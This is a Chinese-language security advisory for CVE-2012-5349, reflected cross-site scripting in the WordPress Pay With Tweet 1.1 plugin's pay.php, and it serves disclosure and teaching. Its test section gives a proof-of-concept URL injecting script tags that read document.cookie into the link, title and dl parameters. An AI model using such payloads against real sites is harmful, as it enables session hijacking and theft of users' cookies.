发布日期:2012-01-06
更新日期:2012-10-17受影响系统:
WordPress Pay With Tweet 1.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51308
CVE ID: CVE-2012-5349Pay With Tweet plugin for WordPress是社会媒体市场营销系统。Pay With Tweet 1.1及其他版本插件的pay.php内存在多个XSS漏洞,通过 link、title、dl参数,可允许远程攻击者注入任意Web脚本或HTML。<*来源:Gianluca Brindisi
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/wp-content/plugins/pay-with-tweet.php/pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.tenable.com/IpTools Tiny TCP/IP服务器目录遍历漏洞Nginx “location”受限制资源服务漏洞相关资讯 跨站脚本执行漏洞 WordPress安全漏洞
- Wordpress Lazy SEO插件Shell上传 (09/23/2013 18:12:26)
- WordPress crypt_private()远程拒 (06/30/2013 06:24:06)
- WordPress ProPlayer 插件"id"参数 (05/23/2013 20:13:32)
| - WordPress HMS Testimonials 2.0. (08/10/2013 14:28:41)
- WordPress Image Slider with (05/29/2013 19:27:42)
- WordPress WP Cleanfix 插件" (05/21/2013 19:36:23)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
|